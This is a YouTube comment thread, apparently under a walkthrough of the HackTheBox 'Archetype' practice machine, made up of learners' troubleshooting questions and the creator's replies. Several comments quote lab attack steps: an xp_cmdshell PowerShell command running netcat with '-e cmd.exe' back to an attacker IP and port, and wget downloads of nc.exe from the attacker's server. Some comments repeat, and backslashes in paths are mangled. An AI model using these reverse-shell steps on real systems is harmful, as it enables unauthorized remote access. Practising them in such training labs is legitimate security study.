I haven’t commented in years but this is a genuinely great account, I appreciate how you see things that maybe you wondered about when you were learning and then explain it to us perfectly, thank u sm
Thanks bruh, you are helping me a lot in my studies. When i get lost i came here just to get a little hint, and then continue by myself. Wish you and your channel success!
Hey thank you for your videos, I'm learning a lot, and I'm also having so much fun. This is the best study tool ever! I hope you will continue making these videos.
Great content - quick question, through HTB Academy I’ve learned that using scripts like LinEnum & WinPEAS is helpful to find footholds to privesc, but what knowledge/resources are you drawing from in order to know to use the impacket tools? From my perspective, looking at the hints on HTB I wouldn’t have been able to know to use those tools, so how did you know how to use that? Is that something that just came from a lot of trial and error? Maybe past experience with similar roadblocks in other boxes? Or are you just doing open source resesrch when you are finding particular services running on a box to know that you should be using those scripts? Just curious to know the methodology you use to know to use Impacket tools. Love your content. ❤
Watch this atfer finish Archetype. Thanks it helps for beginners like us. For me its help to know what i just did. And help for chronology of commands. Because when we'll try the labs section, little question before the flag won't be there.
Hi. I'm having a error after the xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; . c.exe -e cmd.exe " command. It says that program nc.exe failed to run. Its either corrupted or unreadable.
I have that same issue too, for some reason while listening on http i get an error 404 code therefore leading to nc.exe not being able to run as an executable command in sql but i still cant figure out how to fix it
I noticed that it isn't pinging from the machine to me, but from me to the machine it goes well. do you know why? and is it the reason why the "wget" dosent work for it?
When running winpeas it isn't showing the any file for C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -edit running the .bat version of winpeas got the file
If your python3 server doesn't seem to be working and getting a 404 error in terminal. Make sure you are running the server INSIDE the nc.exe folder -- for me in Kali this was under "usr/share/windows-resources/binaries" and the server was able to work and give me a 200 code
Hello, i just started getting into ctfs, but in this video i didn't really understand why did you use impacket mysql? Could you have used the normal mysql?
so the impacket mysql script used here is a security tool used against SQL servers. Whereas MySQL is a Database Management System that is used to manage database storage and organization on a system!
WiNPEAS.exe is still not showing up in the github directory, can you please look inside the github and see what problem we are referring too. After could you provide a link with a proper winpeas.exe. Your notion says it needs to be sharred and I can not access it.
Thanks bro I got stuck on the mssqlclient part. And if you don't mind would you give us link or anything to all these external tools like impact that could help us?
Yeah the Notion link in the description has a written walkthrough of the lab and all of the external tools (like impacket) are linked under the archetype write up!
🤔🤔🤔 my user flag isn’t working. Followed the walkthrough made it to the root.txt, type root.txt and it’s listed. Copied and pasted and says incorrect then manually typed it in and same outcome. Watched your video and we got the same root flag. So idk what’s going on.
Hello! I need some help! After typing the wget MYIP/nc.exe I get an error saying that "Access to path C:\Windows\System32 c.exe is denied.... How can I solve this!
I could not for the life of me spin up a server without this error preventing me from going anywhere, "OSError: [Errno 98] Address already in use." My Google searches didn't lead me to a way to combat this. After looking to see what is listening on that port, there is nothing when I run, "lsof -i :80" Any idea of what's going on here?
hmmmm that's certainly an odd one. Have you tried to change the port of the HTTP server you're trying to spin up? It also sounds like there could be a flub in your /etc/hosts file
really.. doesnt work for me... when i do xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; . c64.exe -e cmd.exe i get a NULL and my listerner doesnt report anything
@@FindingUrPasswd I'm having the same issue.. I had a 200 on the nc GET, but now i cant get the listener to work (executing listener from downloads dir).. Also tried to add rules in ufw but no success
this is the solution if you have the 404 error issue just do this ( cd /usr/share/windows-resources/binaries) then run the http server in it (sudo python3 http.server 80). Its going to work and give you a 200 code success
I haven’t commented in years but this is a genuinely great account, I appreciate how you see things that maybe you wondered about when you were learning and then explain it to us perfectly, thank u sm
Thanks bruh, you are helping me a lot in my studies. When i get lost i came here just to get a little hint, and then continue by myself.
Wish you and your channel success!
Of course! Thanks for watching :)
I am a newbie to CC, but this video helped me understand how things are happening & made me step up to the next level. Thanks a bunch...
Hey thank you for your videos, I'm learning a lot, and I'm also having so much fun. This is the best study tool ever! I hope you will continue making these videos.
Keep it up man!!!!! Your notes on notion are even better than writeups of HackTheBox!!
Dude thank you so much! As a complete newbie I could not get this to work with just the text walkthrough. You made a super helpful guide!
thank you for going through this step by step at a nice pace
S Tier explanation. Thank you I was struggling with this machine a lot
Love you man
i knew what i had to do but i forgot some of the microsoft SQL commands. This really helped so thanks
Thanks so much for the tutorial. I was missing some of the http service and this really helped!
That's an amazing explanation bro, waiting for oopsie walkthrough
Finishing editing the video for oopsie now actually! Will be up in a few hours! If you’re subbed you should get a notification when it goes live
I'm a regular follower of your videos bro. I hope we can connect somewhere else, please give me any way to connect with you.
@@sandeshhegde2919 I’m super active on Twitter, find over me there my username is @FindingUrPasswd !
@@FindingUrPasswd thank you so much Jake! ❤️
Great content man! Really well explained!
Great content - quick question, through HTB Academy I’ve learned that using scripts like LinEnum & WinPEAS is helpful to find footholds to privesc, but what knowledge/resources are you drawing from in order to know to use the impacket tools? From my perspective, looking at the hints on HTB I wouldn’t have been able to know to use those tools, so how did you know how to use that? Is that something that just came from a lot of trial and error? Maybe past experience with similar roadblocks in other boxes? Or are you just doing open source resesrch when you are finding particular services running on a box to know that you should be using those scripts? Just curious to know the methodology you use to know to use Impacket tools. Love your content. ❤
14:41 I took 404, file not found error. How i get nc.exe file? You downloaded it from where?
You can get it from the write ups of the box on my Notion link- I have it linked in there!
@@FindingUrPasswd thanks!
Watch this atfer finish Archetype. Thanks it helps for beginners like us. For me its help to know what i just did. And help for chronology of commands. Because when we'll try the labs section, little question before the flag won't be there.
Esse final com o WinPeas me quebrou todo
Thanks Bro 🦆🤝🏻🦆
Why at minute 15:00 you get "any" and my "family"?
Hi. I'm having a error after the xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .
c.exe -e cmd.exe " command. It says that program nc.exe failed to run. Its either corrupted or unreadable.
I have that same issue too, for some reason while listening on http i get an error 404 code therefore leading to nc.exe not being able to run as an executable command in sql but i still cant figure out how to fix it
@@SEAN-bq1sh same omg
@@SEAN-bq1sh make sure you're running your http server from the directory where you saved your nc.exe file
@@SEAN-bq1sh Same issue! "GET /nc.exe HTTP/1.1" 404 -
@@a.c.130 no esta el archivo en el directorio desde donde lo estas subiendo. capas :)
Great video, great informations, thank you a lot!
Hey great video, I wanted to ask what the code was for the Winpeas download. I can't really find it anywhere else
Check out the link to my Notion repository in the description. I have the link to the winPEAS download linked in there under the archetype machine!
Okay I got it, thank you!
very clear explanation sir
so if my nc.exe is in a different folder I have to move it?
nice job buddy!! keep going!!
I noticed that it isn't pinging from the machine to me, but from me to the machine it goes well. do you know why? and is it the reason why the "wget" dosent work for it?
When running winpeas it isn't showing the any file for C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -edit running the .bat version of winpeas got the file
Thanks You! Was very well for me!
If your python3 server doesn't seem to be working and getting a 404 error in terminal. Make sure you are running the server INSIDE the nc.exe folder -- for me in Kali this was under "usr/share/windows-resources/binaries" and the server was able to work and give me a 200 code
Bro you just saved me from so much frustration this was my exact issue. Love u
Hello, i just started getting into ctfs, but in this video i didn't really understand why did you use impacket mysql? Could you have used the normal mysql?
so the impacket mysql script used here is a security tool used against SQL servers. Whereas MySQL is a Database Management System that is used to manage database storage and organization on a system!
@@FindingUrPasswd Thank you for your reply, keep up the good videos.
I have been learning a lot.
Hey man, love the videos. Only thing i wish you had were sections or time stamps. Otherwise top notch!
Thank you!! I’m working on putting them into some of my newer videos actually. I love hearing this feedback so I know what to add though! 😄
Why do we add back ticks when using smb and specifying switches?
The notion link doesn't seem to work.
how dou know that downloads is the correct directory?
Hey I keep getting command not found in the netcat part. Could you show what to do if nc isn't in your root folder?
/how to make the path, is it / \ some mix of the 2 or something else?
WiNPEAS.exe is still not showing up in the github directory, can you please look inside the github and see what problem we are referring too. After could you provide a link with a proper winpeas.exe. Your notion says it needs to be sharred and I can not access it.
Where is winPeass????
Thanks bro I got stuck on the mssqlclient part. And if you don't mind would you give us link or anything to all these external tools like impact that could help us?
Yeah the Notion link in the description has a written walkthrough of the lab and all of the external tools (like impacket) are linked under the archetype write up!
how can i open the notion link, i dont have acces
Hey i have a problem when i try to wget the nc.exe file . I get http 404 not found.
i can't get access to your notes page
🤔🤔🤔 my user flag isn’t working. Followed the walkthrough made it to the root.txt, type root.txt and it’s listed. Copied and pasted and says incorrect then manually typed it in and same outcome. Watched your video and we got the same root flag. So idk what’s going on.
NeverMind! 🤦🏻♂️🤦🏻♂️🤦🏻♂️ I forgot to submit the first flag 🤦🏻♂️🤦🏻♂️🤦🏻♂️🤦🏻♂️
It shows login failed for user 'ARCHETYPE\Guest'.
what do i do if it says unable to connect to the remote server
I get the same. Any solutions?
@@KiingConvictGaming all i did was keep disconnecting and retrying
thank you so much you helped me a lot !
De donde sacas el archivo nc.exe?
I keep getting an error with the wget please help
edit: nvm I had a typo in my IP address
idk why my locate command doesn´t find anything, but if I go to the path I find the file.
Good videos!
Try to run ‘updatedb’ and then give locate a shot again!
Cheers, keep up the good work
When i tried is talling winPEAS the winpeasex64 file didnt exist
Grab winPEAS from here: github.com/carlospolop/PEASS-ng/tree/master/winPEAS
:)
@@FindingUrPasswd still cant find it from here
Jake, quality content brother keep it up! You’re on your way to greatness for sure! Sent you a follow on the old tweet tweet! 🐦 🐣 🐥
Absolute legend
your notion repository is blocking us from access
really nice video
Thanks for video
OOOOOOHHHHH I got jacked again OHHHHHH
how do I get the winPEASx64.exe file I've downloaded it from the link and cant find it
why do i get a address already in use when attempting the sudo python3 -m http.server 80
Hello! I need some help! After typing the wget MYIP/nc.exe I get an error saying that "Access to path C:\Windows\System32
c.exe is denied.... How can I solve this!
Please share you notion link it is not working
I could not for the life of me spin up a server without this error preventing me from going anywhere, "OSError: [Errno 98] Address already in use." My Google searches didn't lead me to a way to combat this. After looking to see what is listening on that port, there is nothing when I run, "lsof -i :80"
Any idea of what's going on here?
hmmmm that's certainly an odd one. Have you tried to change the port of the HTTP server you're trying to spin up? It also sounds like there could be a flub in your /etc/hosts file
when ever i run xp_cmdshell "powershell -c cd C:\Users\ssql_svc\Downloads; .
c.exe -e cmd.exe 10.10.14.45 4444" the nc stays the same nothing happends
really.. doesnt work for me...
when i do xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .
c64.exe -e cmd.exe
i get a NULL
and my listerner doesnt report anything
can you confirm that netcat is in the Downloads folder?
@@FindingUrPasswd I solved the problem. I had to add a rule in my ufw settings ;)! But this had cost me some time to figure out
@@FindingUrPasswd I'm having the same issue.. I had a 200 on the nc GET, but now i cant get the listener to work (executing listener from downloads dir).. Also tried to add rules in ufw but no success
this is the solution if you have the 404 error issue just do this ( cd /usr/share/windows-resources/binaries) then run the http server in it (sudo python3 http.server 80). Its going to work and give you a 200 code success